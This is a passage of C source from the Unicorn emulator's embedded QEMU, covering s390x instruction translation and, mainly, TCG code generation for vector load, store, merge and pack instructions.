*/ if (dc->do_debug) { gen_exception(tcg_ctx, EXCP_DEBUG); } else if (use_exit_tb(dc) || dc->base.is_jmp == DISAS_PC_STALE_NOCHAIN) { tcg_gen_exit_tb(tcg_ctx, NULL, 0); } else { tcg_gen_lookup_and_goto_ptr(tcg_ctx); } break; default: // g_assert_not_reached(); break; } } static const TranslatorOps s390x_tr_ops = { .init_disas_context = s390x_tr_init_disas_context, .tb_start = s390x_tr_tb_start, .insn_start = s390x_tr_insn_start, .breakpoint_check = s390x_tr_breakpoint_check, .translate_insn = s390x_tr_translate_insn, .tb_stop = s390x_tr_tb_stop, }; void gen_intermediate_code(CPUState *cs, TranslationBlock *tb, int max_insns) { DisasContext dc; translator_loop(&s390x_tr_ops, &dc.base, cs, tb, max_insns); } void restore_state_to_opc(CPUS390XState *env, TranslationBlock *tb, target_ulong *data) { int cc_op = data[1]; env->psw.addr = data[0]; /* Update the CC opcode if it is not already up-to-date. */ if ((cc_op != CC_OP_DYNAMIC) && (cc_op != CC_OP_STATIC)) { env->cc_op = cc_op; } /* Record ILEN. */ env->int_pgm_ilen = data[2]; }
unicorn-2.1.1/qemu/target/s390x/translate_vx.inc.c
/* * QEMU TCG support -- s390x vector instruction translation functions * * Copyright (C) 2019 Red Hat Inc * * Authors: * David Hildenbrand <david@redhat.com> * * This work is licensed under the terms of the GNU GPL, version 2 or later. * See the COPYING file in the top-level directory. */ /* * For most instructions that use the same element size for reads and * writes, we can use real gvec vector expansion, which potentially uses * real host vector instructions. As they only work up to 64 bit elements, * 128 bit elements (vector is a single element) have to be handled * differently. Operations that are too complicated to encode via TCG ops * are handled via gvec ool (out-of-line) handlers. * * As soon as instructions use different element sizes for reads and writes * or access elements "out of their element scope" we expand them manually * in fancy loops, as gvec expansion does not deal with actual element * numbers and also does not support access to other elements. * * 128 bit elements: * As we only have i32/i64, such elements have to be loaded into two * i64 values and can then be processed e.g. by tcg_gen_add2_i64. * * Sizes: * On s390x, the operand size (oprsz) and the maximum size (maxsz) are * always 16 (128 bit). What gvec code calls "vece", s390x calls "es", * a.k.a. "element size". These values nicely map to MO_8 ... MO_64. Only * 128 bit element size has to be treated in a special way (MO_64 + 1). * We will use ES_* instead of MO_* for this reason in this file.
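 * As an illustration of the mapping above: with es == ES_8 a vector
 * register holds 16 one-byte elements, with es == ES_32 it holds 4 and
 * with es == ES_64 it holds 2, while es == ES_128 makes the whole 128 bit
 * register a single element that is emulated with two i64 values.
 *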
* * CC handling: * As gvec ool-helpers currently cannot return values (besides via * pointers like vectors or cpu_env), whenever we have to set the CC and * can't conclude the value from the result vector, we will directly * set it in "env->cc_op" and mark it as static via set_cc_static(). * Whenever this is done, the helper writes globals (cc_op). */ #define NUM_VEC_ELEMENT_BYTES(es) (1 << (es)) #define NUM_VEC_ELEMENTS(es) (16 / NUM_VEC_ELEMENT_BYTES(es)) #define NUM_VEC_ELEMENT_BITS(es) (NUM_VEC_ELEMENT_BYTES(es) * BITS_PER_BYTE) #define ES_8 MO_8 #define ES_16 MO_16 #define ES_32 MO_32 #define ES_64 MO_64 #define ES_128 4 /* Floating-Point Format */ #define FPF_SHORT 2 #define FPF_LONG 3 #define FPF_EXT 4 static inline bool valid_vec_element(uint8_t enr, MemOp es) { return !(enr & ~(NUM_VEC_ELEMENTS(es) - 1)); } static void read_vec_element_i64(TCGContext *tcg_ctx, TCGv_i64 dst, uint8_t reg, uint8_t enr, MemOp memop) { const int offs = vec_reg_offset(reg, enr, memop & MO_SIZE); switch (memop) { case ES_8: tcg_gen_ld8u_i64(tcg_ctx, dst, tcg_ctx->cpu_env, offs); break; case ES_16: tcg_gen_ld16u_i64(tcg_ctx, dst, tcg_ctx->cpu_env, offs); break; case ES_32: tcg_gen_ld32u_i64(tcg_ctx, dst, tcg_ctx->cpu_env, offs); break; case ES_8 | MO_SIGN: tcg_gen_ld8s_i64(tcg_ctx, dst, tcg_ctx->cpu_env, offs); break; case ES_16 | MO_SIGN: tcg_gen_ld16s_i64(tcg_ctx, dst, tcg_ctx->cpu_env, offs); break; case ES_32 | MO_SIGN: tcg_gen_ld32s_i64(tcg_ctx, dst, tcg_ctx->cpu_env, offs); break; case ES_64: case ES_64 | MO_SIGN: tcg_gen_ld_i64(tcg_ctx, dst, tcg_ctx->cpu_env, offs); break; default: g_assert_not_reached(); } } static void read_vec_element_i32(TCGContext *tcg_ctx, TCGv_i32 dst, uint8_t reg, uint8_t enr, MemOp memop) { const int offs = vec_reg_offset(reg, enr, memop & MO_SIZE); switch (memop) { case ES_8: tcg_gen_ld8u_i32(tcg_ctx, dst, tcg_ctx->cpu_env, offs); break; case ES_16: tcg_gen_ld16u_i32(tcg_ctx, dst, tcg_ctx->cpu_env, offs); break; case ES_8 | MO_SIGN: tcg_gen_ld8s_i32(tcg_ctx, dst, tcg_ctx->cpu_env, offs); break; case ES_16 | MO_SIGN: tcg_gen_ld16s_i32(tcg_ctx, dst, tcg_ctx->cpu_env, offs); break; case ES_32: case ES_32 | MO_SIGN: tcg_gen_ld_i32(tcg_ctx, dst, tcg_ctx->cpu_env, offs); break; default: // g_assert_not_reached(); break; } } static void write_vec_element_i64(TCGContext *tcg_ctx, TCGv_i64 src, int reg, uint8_t enr, MemOp memop) { const int offs = vec_reg_offset(reg, enr, memop & MO_SIZE); switch (memop) { case ES_8: tcg_gen_st8_i64(tcg_ctx, src, tcg_ctx->cpu_env, offs); break; case ES_16: tcg_gen_st16_i64(tcg_ctx, src, tcg_ctx->cpu_env, offs); break; case ES_32: tcg_gen_st32_i64(tcg_ctx, src, tcg_ctx->cpu_env, offs); break; case ES_64: tcg_gen_st_i64(tcg_ctx, src, tcg_ctx->cpu_env, offs); break; default: g_assert_not_reached(); } } static void write_vec_element_i32(TCGContext *tcg_ctx, TCGv_i32 src, int reg, uint8_t enr, MemOp memop) { const int offs = vec_reg_offset(reg, enr, memop & MO_SIZE); switch (memop) { case ES_8: tcg_gen_st8_i32(tcg_ctx, src, tcg_ctx->cpu_env, offs); break; case ES_16: tcg_gen_st16_i32(tcg_ctx, src, tcg_ctx->cpu_env, offs); break; case ES_32: tcg_gen_st_i32(tcg_ctx, src, tcg_ctx->cpu_env, offs); break; default: // g_assert_not_reached(); break; } } static void get_vec_element_ptr_i64(TCGContext *tcg_ctx, TCGv_ptr ptr, uint8_t reg, TCGv_i64 enr, uint8_t es) { TCGv_i64 tmp = tcg_temp_new_i64(tcg_ctx); /* mask off invalid parts from the element nr */ tcg_gen_andi_i64(tcg_ctx, tmp, enr, NUM_VEC_ELEMENTS(es) - 1); /* convert it to an element offset relative
to cpu_env (vec_reg_offset()) */ tcg_gen_shli_i64(tcg_ctx, tmp, tmp, es); #ifndef HOST_WORDS_BIGENDIAN tcg_gen_xori_i64(tcg_ctx, tmp, tmp, 8 - NUM_VEC_ELEMENT_BYTES(es)); #endif tcg_gen_addi_i64(tcg_ctx, tmp, tmp, vec_full_reg_offset(reg)); /* generate the final ptr by adding cpu_env */ tcg_gen_trunc_i64_ptr(tcg_ctx, ptr, tmp); tcg_gen_add_ptr(tcg_ctx, ptr, ptr, tcg_ctx->cpu_env); tcg_temp_free_i64(tcg_ctx, tmp); } #define gen_gvec_2(tcg_ctx, v1, v2, gen) \ tcg_gen_gvec_2(tcg_ctx, vec_full_reg_offset(v1), vec_full_reg_offset(v2), \ 16, 16, gen) #define gen_gvec_2s(tcg_ctx, v1, v2, c, gen) \ tcg_gen_gvec_2s(tcg_ctx, vec_full_reg_offset(v1), vec_full_reg_offset(v2), \ 16, 16, c, gen) #define gen_gvec_2_ool(tcg_ctx, v1, v2, data, fn) \ tcg_gen_gvec_2_ool(tcg_ctx, vec_full_reg_offset(v1), vec_full_reg_offset(v2), \ 16, 16, data, fn) #define gen_gvec_2i_ool(tcg_ctx, v1, v2, c, data, fn) \ tcg_gen_gvec_2i_ool(tcg_ctx, vec_full_reg_offset(v1), vec_full_reg_offset(v2), \ c, 16, 16, data, fn) #define gen_gvec_2_ptr(tcg_ctx, v1, v2, ptr, data, fn) \ tcg_gen_gvec_2_ptr(tcg_ctx, vec_full_reg_offset(v1), vec_full_reg_offset(v2), \ ptr, 16, 16, data, fn) #define gen_gvec_3(tcg_ctx, v1, v2, v3, gen) \ tcg_gen_gvec_3(tcg_ctx, vec_full_reg_offset(v1), vec_full_reg_offset(v2), \ vec_full_reg_offset(v3), 16, 16, gen) #define gen_gvec_3_ool(tcg_ctx, v1, v2, v3, data, fn) \ tcg_gen_gvec_3_ool(tcg_ctx, vec_full_reg_offset(v1), vec_full_reg_offset(v2), \ vec_full_reg_offset(v3), 16, 16, data, fn) #define gen_gvec_3_ptr(tcg_ctx, v1, v2, v3, ptr, data, fn) \ tcg_gen_gvec_3_ptr(tcg_ctx, vec_full_reg_offset(v1), vec_full_reg_offset(v2), \ vec_full_reg_offset(v3), ptr, 16, 16, data, fn) #define gen_gvec_3i(tcg_ctx, v1, v2, v3, c, gen) \ tcg_gen_gvec_3i(tcg_ctx, vec_full_reg_offset(v1), vec_full_reg_offset(v2), \ vec_full_reg_offset(v3), 16, 16, c, gen) #define gen_gvec_4(tcg_ctx, v1, v2, v3, v4, gen) \ tcg_gen_gvec_4(tcg_ctx, vec_full_reg_offset(v1), vec_full_reg_offset(v2), \ vec_full_reg_offset(v3), vec_full_reg_offset(v4), \ 16, 16, gen) #define gen_gvec_4_ool(tcg_ctx, v1, v2, v3, v4, data, fn) \ tcg_gen_gvec_4_ool(tcg_ctx, vec_full_reg_offset(v1), vec_full_reg_offset(v2), \ vec_full_reg_offset(v3), vec_full_reg_offset(v4), \ 16, 16, data, fn) #define gen_gvec_4_ptr(tcg_ctx, v1, v2, v3, v4, ptr, data, fn) \ tcg_gen_gvec_4_ptr(tcg_ctx, vec_full_reg_offset(v1), vec_full_reg_offset(v2), \ vec_full_reg_offset(v3), vec_full_reg_offset(v4), \ ptr, 16, 16, data, fn) #define gen_gvec_dup_i64(tcg_ctx, es, v1, c) \ tcg_gen_gvec_dup_i64(tcg_ctx, es, vec_full_reg_offset(v1), 16, 16, c) #define gen_gvec_mov(tcg_ctx, v1, v2) \ tcg_gen_gvec_mov(tcg_ctx, 0, vec_full_reg_offset(v1), vec_full_reg_offset(v2), 16, \ 16) #define gen_gvec_dup64i(tcg_ctx, v1, c) \ tcg_gen_gvec_dup64i(tcg_ctx, vec_full_reg_offset(v1), 16, 16, c) #define gen_gvec_fn_2(tcg_ctx, fn, es, v1, v2) \ tcg_gen_gvec_##fn(tcg_ctx, es, vec_full_reg_offset(v1), vec_full_reg_offset(v2), \ 16, 16) #define gen_gvec_fn_2i(tcg_ctx, fn, es, v1, v2, c) \ tcg_gen_gvec_##fn(tcg_ctx, es, vec_full_reg_offset(v1), vec_full_reg_offset(v2), \ c, 16, 16) #define gen_gvec_fn_2s(tcg_ctx, fn, es, v1, v2, s) \ tcg_gen_gvec_##fn(tcg_ctx, es, vec_full_reg_offset(v1), vec_full_reg_offset(v2), \ s, 16, 16) #define gen_gvec_fn_3(tcg_ctx, fn, es, v1, v2, v3) \ tcg_gen_gvec_##fn(tcg_ctx, es, vec_full_reg_offset(v1), vec_full_reg_offset(v2), \ vec_full_reg_offset(v3), 16, 16) #define gen_gvec_fn_4(tcg_ctx, fn, es, v1, v2, v3, v4) \ tcg_gen_gvec_##fn(tcg_ctx, es, vec_full_reg_offset(v1),
vec_full_reg_offset(v2), \ vec_full_reg_offset(v3), vec_full_reg_offset(v4), 16, 16) /* * Helper to carry out a 128 bit vector computation using 2 i64 values per * vector. */ typedef void (*gen_gvec128_3_i64_fn)(TCGContext *tcg_ctx, TCGv_i64 dl, TCGv_i64 dh, TCGv_i64 al, TCGv_i64 ah, TCGv_i64 bl, TCGv_i64 bh); static void gen_gvec128_3_i64(TCGContext *tcg_ctx, gen_gvec128_3_i64_fn fn, uint8_t d, uint8_t a, uint8_t b) { TCGv_i64 dh = tcg_temp_new_i64(tcg_ctx); TCGv_i64 dl = tcg_temp_new_i64(tcg_ctx); TCGv_i64 ah = tcg_temp_new_i64(tcg_ctx); TCGv_i64 al = tcg_temp_new_i64(tcg_ctx); TCGv_i64 bh = tcg_temp_new_i64(tcg_ctx); TCGv_i64 bl = tcg_temp_new_i64(tcg_ctx); read_vec_element_i64(tcg_ctx, ah, a, 0, ES_64); read_vec_element_i64(tcg_ctx, al, a, 1, ES_64); read_vec_element_i64(tcg_ctx, bh, b, 0, ES_64); read_vec_element_i64(tcg_ctx, bl, b, 1, ES_64); fn(tcg_ctx, dl, dh, al, ah, bl, bh); write_vec_element_i64(tcg_ctx, dh, d, 0, ES_64); write_vec_element_i64(tcg_ctx, dl, d, 1, ES_64); tcg_temp_free_i64(tcg_ctx, dh); tcg_temp_free_i64(tcg_ctx, dl); tcg_temp_free_i64(tcg_ctx, ah); tcg_temp_free_i64(tcg_ctx, al); tcg_temp_free_i64(tcg_ctx, bh); tcg_temp_free_i64(tcg_ctx, bl); } typedef void (*gen_gvec128_4_i64_fn)(TCGContext *tcg_ctx, TCGv_i64 dl, TCGv_i64 dh, TCGv_i64 al, TCGv_i64 ah, TCGv_i64 bl, TCGv_i64 bh, TCGv_i64 cl, TCGv_i64 ch); static void gen_gvec128_4_i64(TCGContext *tcg_ctx, gen_gvec128_4_i64_fn fn, uint8_t d, uint8_t a, uint8_t b, uint8_t c) { TCGv_i64 dh = tcg_temp_new_i64(tcg_ctx); TCGv_i64 dl = tcg_temp_new_i64(tcg_ctx); TCGv_i64 ah = tcg_temp_new_i64(tcg_ctx); TCGv_i64 al = tcg_temp_new_i64(tcg_ctx); TCGv_i64 bh = tcg_temp_new_i64(tcg_ctx); TCGv_i64 bl = tcg_temp_new_i64(tcg_ctx); TCGv_i64 ch = tcg_temp_new_i64(tcg_ctx); TCGv_i64 cl = tcg_temp_new_i64(tcg_ctx); read_vec_element_i64(tcg_ctx, ah, a, 0, ES_64); read_vec_element_i64(tcg_ctx, al, a, 1, ES_64); read_vec_element_i64(tcg_ctx, bh, b, 0, ES_64); read_vec_element_i64(tcg_ctx, bl, b, 1, ES_64); read_vec_element_i64(tcg_ctx, ch, c, 0, ES_64); read_vec_element_i64(tcg_ctx, cl, c, 1, ES_64); fn(tcg_ctx, dl, dh, al, ah, bl, bh, cl, ch); write_vec_element_i64(tcg_ctx, dh, d, 0, ES_64); write_vec_element_i64(tcg_ctx, dl, d, 1, ES_64); tcg_temp_free_i64(tcg_ctx, dh); tcg_temp_free_i64(tcg_ctx, dl); tcg_temp_free_i64(tcg_ctx, ah); tcg_temp_free_i64(tcg_ctx, al); tcg_temp_free_i64(tcg_ctx, bh); tcg_temp_free_i64(tcg_ctx, bl); tcg_temp_free_i64(tcg_ctx, ch); tcg_temp_free_i64(tcg_ctx, cl); } static void gen_gvec_dupi(TCGContext *tcg_ctx, uint8_t es, uint8_t reg, uint64_t c) { switch (es) { case ES_8: tcg_gen_gvec_dup8i(tcg_ctx, vec_full_reg_offset(reg), 16, 16, c); break; case ES_16: tcg_gen_gvec_dup16i(tcg_ctx, vec_full_reg_offset(reg), 16, 16, c); break; case ES_32: tcg_gen_gvec_dup32i(tcg_ctx, vec_full_reg_offset(reg), 16, 16, c); break; case ES_64: gen_gvec_dup64i(tcg_ctx, reg, c); break; default: g_assert_not_reached(); } } static void zero_vec(TCGContext *tcg_ctx, uint8_t reg) { tcg_gen_gvec_dup8i(tcg_ctx, vec_full_reg_offset(reg), 16, 16, 0); } static void gen_addi2_i64(TCGContext *tcg_ctx, TCGv_i64 dl, TCGv_i64 dh, TCGv_i64 al, TCGv_i64 ah, uint64_t b) { TCGv_i64 bl = tcg_const_i64(tcg_ctx, b); TCGv_i64 bh = tcg_const_i64(tcg_ctx, 0); tcg_gen_add2_i64(tcg_ctx, dl, dh, al, ah, bl, bh); tcg_temp_free_i64(tcg_ctx, bl); tcg_temp_free_i64(tcg_ctx, bh); } static DisasJumpType op_vge(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; const uint8_t es = s->insn->data; const uint8_t enr = get_field(s, m3); TCGv_i64 
tmp; if (!valid_vec_element(enr, es)) { gen_program_exception(s, PGM_SPECIFICATION); return DISAS_NORETURN; } tmp = tcg_temp_new_i64(tcg_ctx); read_vec_element_i64(tcg_ctx, tmp, get_field(s, v2), enr, es); tcg_gen_add_i64(tcg_ctx, o->addr1, o->addr1, tmp); gen_addi_and_wrap_i64(s, o->addr1, o->addr1, 0); tcg_gen_qemu_ld_i64(tcg_ctx, tmp, o->addr1, get_mem_index(s), MO_TE | es); write_vec_element_i64(tcg_ctx, tmp, get_field(s, v1), enr, es); tcg_temp_free_i64(tcg_ctx, tmp); return DISAS_NEXT; } static uint64_t generate_byte_mask(uint8_t mask) { uint64_t r = 0; int i; for (i = 0; i < 8; i++) { if ((mask >> i) & 1) { r |= 0xffull << (i * 8); } } return r; } static DisasJumpType op_vgbm(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; const uint16_t i2 = get_field(s, i2); if (i2 == (i2 & 0xff) * 0x0101) { /* * Masks for both 64 bit elements of the vector are the same. * Trust tcg to produce a good constant loading. */ gen_gvec_dup64i(tcg_ctx, get_field(s, v1), generate_byte_mask(i2 & 0xff)); } else { TCGv_i64 t = tcg_temp_new_i64(tcg_ctx); tcg_gen_movi_i64(tcg_ctx, t, generate_byte_mask(i2 >> 8)); write_vec_element_i64(tcg_ctx, t, get_field(s, v1), 0, ES_64); tcg_gen_movi_i64(tcg_ctx, t, generate_byte_mask(i2)); write_vec_element_i64(tcg_ctx, t, get_field(s, v1), 1, ES_64); tcg_temp_free_i64(tcg_ctx, t); } return DISAS_NEXT; } static DisasJumpType op_vgm(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; const uint8_t es = get_field(s, m4); const uint8_t bits = NUM_VEC_ELEMENT_BITS(es); const uint8_t i2 = get_field(s, i2) & (bits - 1); const uint8_t i3 = get_field(s, i3) & (bits - 1); uint64_t mask = 0; int i; if (es > ES_64) { gen_program_exception(s, PGM_SPECIFICATION); return DISAS_NORETURN; } /* generate the mask - take care of wrapping */ for (i = i2; ; i = (i + 1) % bits) { mask |= 1ull << (bits - i - 1); if (i == i3) { break; } } gen_gvec_dupi(tcg_ctx, es, get_field(s, v1), mask); return DISAS_NEXT; } static DisasJumpType op_vl(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i64 t0 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t1 = tcg_temp_new_i64(tcg_ctx); tcg_gen_qemu_ld_i64(tcg_ctx, t0, o->addr1, get_mem_index(s), MO_TEQ); gen_addi_and_wrap_i64(s, o->addr1, o->addr1, 8); tcg_gen_qemu_ld_i64(tcg_ctx, t1, o->addr1, get_mem_index(s), MO_TEQ); write_vec_element_i64(tcg_ctx, t0, get_field(s, v1), 0, ES_64); write_vec_element_i64(tcg_ctx, t1, get_field(s, v1), 1, ES_64); tcg_temp_free(tcg_ctx, t0); tcg_temp_free(tcg_ctx, t1); return DISAS_NEXT; } static DisasJumpType op_vlr(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_gvec_mov(tcg_ctx, get_field(s, v1), get_field(s, v2)); return DISAS_NEXT; } static DisasJumpType op_vlrep(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; const uint8_t es = get_field(s, m3); TCGv_i64 tmp; if (es > ES_64) { gen_program_exception(s, PGM_SPECIFICATION); return DISAS_NORETURN; } tmp = tcg_temp_new_i64(tcg_ctx); tcg_gen_qemu_ld_i64(tcg_ctx, tmp, o->addr1, get_mem_index(s), MO_TE | es); gen_gvec_dup_i64(tcg_ctx, es, get_field(s, v1), tmp); tcg_temp_free_i64(tcg_ctx, tmp); return DISAS_NEXT; } static DisasJumpType op_vle(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; const uint8_t es = s->insn->data; const uint8_t enr = get_field(s, m3); TCGv_i64 tmp; if (!valid_vec_element(enr, es)) { gen_program_exception(s, PGM_SPECIFICATION); return DISAS_NORETURN; } tmp = tcg_temp_new_i64(tcg_ctx); tcg_gen_qemu_ld_i64(tcg_ctx, tmp, o->addr1, 
get_mem_index(s), MO_TE | es); write_vec_element_i64(tcg_ctx, tmp, get_field(s, v1), enr, es); tcg_temp_free_i64(tcg_ctx, tmp); return DISAS_NEXT; } static DisasJumpType op_vlei(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; const uint8_t es = s->insn->data; const uint8_t enr = get_field(s, m3); TCGv_i64 tmp; if (!valid_vec_element(enr, es)) { gen_program_exception(s, PGM_SPECIFICATION); return DISAS_NORETURN; } tmp = tcg_const_i64(tcg_ctx, (int16_t)get_field(s, i2)); write_vec_element_i64(tcg_ctx, tmp, get_field(s, v1), enr, es); tcg_temp_free_i64(tcg_ctx, tmp); return DISAS_NEXT; } static DisasJumpType op_vlgv(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; const uint8_t es = get_field(s, m4); TCGv_ptr ptr; if (es > ES_64) { gen_program_exception(s, PGM_SPECIFICATION); return DISAS_NORETURN; } /* fast path if we don't need the register content */ if (!get_field(s, b2)) { uint8_t enr = get_field(s, d2) & (NUM_VEC_ELEMENTS(es) - 1); read_vec_element_i64(tcg_ctx, o->out, get_field(s, v3), enr, es); return DISAS_NEXT; } ptr = tcg_temp_new_ptr(tcg_ctx); get_vec_element_ptr_i64(tcg_ctx, ptr, get_field(s, v3), o->addr1, es); switch (es) { case ES_8: tcg_gen_ld8u_i64(tcg_ctx, o->out, ptr, 0); break; case ES_16: tcg_gen_ld16u_i64(tcg_ctx, o->out, ptr, 0); break; case ES_32: tcg_gen_ld32u_i64(tcg_ctx, o->out, ptr, 0); break; case ES_64: tcg_gen_ld_i64(tcg_ctx, o->out, ptr, 0); break; default: // g_assert_not_reached(); break; } tcg_temp_free_ptr(tcg_ctx, ptr); return DISAS_NEXT; } static DisasJumpType op_vllez(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; uint8_t es = get_field(s, m3); uint8_t enr; TCGv_i64 t; switch (es) { /* rightmost sub-element of leftmost doubleword */ case ES_8: enr = 7; break; case ES_16: enr = 3; break; case ES_32: enr = 1; break; case ES_64: enr = 0; break; /* leftmost sub-element of leftmost doubleword */ case 6: if (s390_has_feat(s->uc, S390_FEAT_VECTOR_ENH)) { es = ES_32; enr = 0; break; } /* fallthrough */ default: gen_program_exception(s, PGM_SPECIFICATION); return DISAS_NORETURN; } t = tcg_temp_new_i64(tcg_ctx); tcg_gen_qemu_ld_i64(tcg_ctx, t, o->addr1, get_mem_index(s), MO_TE | es); zero_vec(tcg_ctx, get_field(s, v1)); write_vec_element_i64(tcg_ctx, t, get_field(s, v1), enr, es); tcg_temp_free_i64(tcg_ctx, t); return DISAS_NEXT; } static DisasJumpType op_vlm(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; const uint8_t v3 = get_field(s, v3); uint8_t v1 = get_field(s, v1); TCGv_i64 t0, t1; if (v3 < v1 || (v3 - v1 + 1) > 16) { gen_program_exception(s, PGM_SPECIFICATION); return DISAS_NORETURN; } /* * Check for possible access exceptions by trying to load the last * element. The first element will be checked first anyway.
*/ t0 = tcg_temp_new_i64(tcg_ctx); t1 = tcg_temp_new_i64(tcg_ctx); gen_addi_and_wrap_i64(s, t0, o->addr1, (v3 - v1) * 16 + 8); tcg_gen_qemu_ld_i64(tcg_ctx, t0, t0, get_mem_index(s), MO_TEQ); for (;; v1++) { tcg_gen_qemu_ld_i64(tcg_ctx, t1, o->addr1, get_mem_index(s), MO_TEQ); write_vec_element_i64(tcg_ctx, t1, v1, 0, ES_64); if (v1 == v3) { break; } gen_addi_and_wrap_i64(s, o->addr1, o->addr1, 8); tcg_gen_qemu_ld_i64(tcg_ctx, t1, o->addr1, get_mem_index(s), MO_TEQ); write_vec_element_i64(tcg_ctx, t1, v1, 1, ES_64); gen_addi_and_wrap_i64(s, o->addr1, o->addr1, 8); } /* Store the last element, loaded first */ write_vec_element_i64(tcg_ctx, t0, v1, 1, ES_64); tcg_temp_free_i64(tcg_ctx, t0); tcg_temp_free_i64(tcg_ctx, t1); return DISAS_NEXT; } static DisasJumpType op_vlbb(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; const int64_t block_size = (1ull << (get_field(s, m3) + 6)); const int v1_offs = vec_full_reg_offset(get_field(s, v1)); TCGv_ptr a0; TCGv_i64 bytes; if (get_field(s, m3) > 6) { gen_program_exception(s, PGM_SPECIFICATION); return DISAS_NORETURN; } bytes = tcg_temp_new_i64(tcg_ctx); a0 = tcg_temp_new_ptr(tcg_ctx); /* calculate the number of bytes until the next block boundary */ tcg_gen_ori_i64(tcg_ctx, bytes, o->addr1, -block_size); tcg_gen_neg_i64(tcg_ctx, bytes, bytes); tcg_gen_addi_ptr(tcg_ctx, a0, tcg_ctx->cpu_env, v1_offs); gen_helper_vll(tcg_ctx, tcg_ctx->cpu_env, a0, o->addr1, bytes); tcg_temp_free_i64(tcg_ctx, bytes); tcg_temp_free_ptr(tcg_ctx, a0); return DISAS_NEXT; } static DisasJumpType op_vlvg(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; const uint8_t es = get_field(s, m4); TCGv_ptr ptr; if (es > ES_64) { gen_program_exception(s, PGM_SPECIFICATION); return DISAS_NORETURN; } /* fast path if we don't need the register content */ if (!get_field(s, b2)) { uint8_t enr = get_field(s, d2) & (NUM_VEC_ELEMENTS(es) - 1); write_vec_element_i64(tcg_ctx, o->in2, get_field(s, v1), enr, es); return DISAS_NEXT; } ptr = tcg_temp_new_ptr(tcg_ctx); get_vec_element_ptr_i64(tcg_ctx, ptr, get_field(s, v1), o->addr1, es); switch (es) { case ES_8: tcg_gen_st8_i64(tcg_ctx, o->in2, ptr, 0); break; case ES_16: tcg_gen_st16_i64(tcg_ctx, o->in2, ptr, 0); break; case ES_32: tcg_gen_st32_i64(tcg_ctx, o->in2, ptr, 0); break; case ES_64: tcg_gen_st_i64(tcg_ctx, o->in2, ptr, 0); break; default: // g_assert_not_reached(); break; } tcg_temp_free_ptr(tcg_ctx, ptr); return DISAS_NEXT; } static DisasJumpType op_vlvgp(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; write_vec_element_i64(tcg_ctx, o->in1, get_field(s, v1), 0, ES_64); write_vec_element_i64(tcg_ctx, o->in2, get_field(s, v1), 1, ES_64); return DISAS_NEXT; } static DisasJumpType op_vll(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; const int v1_offs = vec_full_reg_offset(get_field(s, v1)); TCGv_ptr a0 = tcg_temp_new_ptr(tcg_ctx); /* convert highest index into an actual length */ tcg_gen_addi_i64(tcg_ctx, o->in2, o->in2, 1); tcg_gen_addi_ptr(tcg_ctx, a0, tcg_ctx->cpu_env, v1_offs); gen_helper_vll(tcg_ctx, tcg_ctx->cpu_env, a0, o->addr1, o->in2); tcg_temp_free_ptr(tcg_ctx, a0); return DISAS_NEXT; } static DisasJumpType op_vmr(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; const uint8_t v1 = get_field(s, v1); const uint8_t v2 = get_field(s, v2); const uint8_t v3 = get_field(s, v3); const uint8_t es = get_field(s, m4); int dst_idx, src_idx; TCGv_i64 tmp; if (es > ES_64) { gen_program_exception(s, PGM_SPECIFICATION); return 
DISAS_NORETURN; } tmp = tcg_temp_new_i64(tcg_ctx); if (s->fields.op2 == 0x61) { /* iterate backwards to avoid overwriting data we might need later */ for (dst_idx = NUM_VEC_ELEMENTS(es) - 1; dst_idx >= 0; dst_idx--) { src_idx = dst_idx / 2; if (dst_idx % 2 == 0) { read_vec_element_i64(tcg_ctx, tmp, v2, src_idx, es); } else { read_vec_element_i64(tcg_ctx, tmp, v3, src_idx, es); } write_vec_element_i64(tcg_ctx, tmp, v1, dst_idx, es); } } else { /* iterate forward to avoid overwriting data we might need later */ for (dst_idx = 0; dst_idx < NUM_VEC_ELEMENTS(es); dst_idx++) { src_idx = (dst_idx + NUM_VEC_ELEMENTS(es)) / 2; if (dst_idx % 2 == 0) { read_vec_element_i64(tcg_ctx, tmp, v2, src_idx, es); } else { read_vec_element_i64(tcg_ctx, tmp, v3, src_idx, es); } write_vec_element_i64(tcg_ctx, tmp, v1, dst_idx, es); } } tcg_temp_free_i64(tcg_ctx, tmp); return DISAS_NEXT; } static DisasJumpType op_vpk(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; const uint8_t v1 = get_field(s, v1); const uint8_t v2 = get_field(s, v2); const uint8_t v3 = get_field(s, v3); const uint8_t es = get_field(s, m4); static gen_helper_gvec_3 * const vpk[3] = { gen_helper_gvec_vpk16, gen_helper_gvec_vpk32, gen_helper_gvec_vpk64, }; static gen_helper_gvec_3 * const vpks[3] = { gen_helper_gvec_vpks16, gen_helper_gvec_vpks32, gen_helper_gvec_vpks64, }; static gen_helper_gvec_3_ptr * const vpks_cc[3] = { gen_helper_gvec_vpks_cc16, gen_helper_gvec_vpks_cc32, gen_helper_gvec_vpks_cc64, }; static gen_helper_gvec_3 * const vpkls[3] = { gen_helper_gvec_vpkls16, gen_helper_gvec_vpkls32, gen_helper_gvec_vpkls64, }; static gen_helper_gvec_3_ptr * const vpkls_cc[3] = { gen_helper_gvec_vpkls_cc16, gen_helper_gvec_vpkls_cc32, gen_helper_gvec_vpkls_cc64, }; if (es == ES_8 || 